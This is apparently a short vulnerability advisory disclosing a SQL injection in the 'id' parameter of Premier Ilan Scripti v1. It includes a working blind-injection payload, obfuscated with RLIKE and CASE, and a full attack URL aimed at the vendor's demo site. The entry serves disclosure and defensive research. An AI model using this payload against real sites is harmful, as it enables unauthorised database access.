Premier Ilan Scripti 1 SQL Injection

Premier Ilan Scripti version 1 suffers from a remote SQL injection vulnerability.


MD5 | 5133a7c95d32dec7583964b929bc752b

===========================================================================================
# Exploit Title: Premier Ilan Scripti - "id" SQL Inj.
# Dork: N/A
# Date: 29-06-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: http://v1.ilanscripti.org/
# Software Link: http://v1.ilanscripti.org/
# Version: v1
# Category: Webapps
# Tested on: Wamp64, Windows
# CVE: N/A
# Software Description:
===========================================================================================
# POC - SQLi
# Parameters : id
# Attack Pattern :
%27/**/RLIKE/**/(case/**/when/**//**/8885330=8885330/**/then/**/0x74657374696E70757476616C7565/**/else/**/0x28/**/end)/**/and/**/'%'='
# GET Method :
http://v1.ilanscripti.org/kiralik-urunler-kategorino-6183.html?sayfa=kategorigoruntule&fiyat1=8100714&fiyat2=3695287&arama=Aramayı
Daralt&durumu=0&sehir=0&ilce=0&sm=0&id=6183%27/**/RLIKE/**/(case/**/when/**//**/8885330=8885330/**/then/**/0x74657374696E70757476616C7565/**/else/**/0x28/**/end)/**/and/**/'%'='
===========================================================================================

Related Posts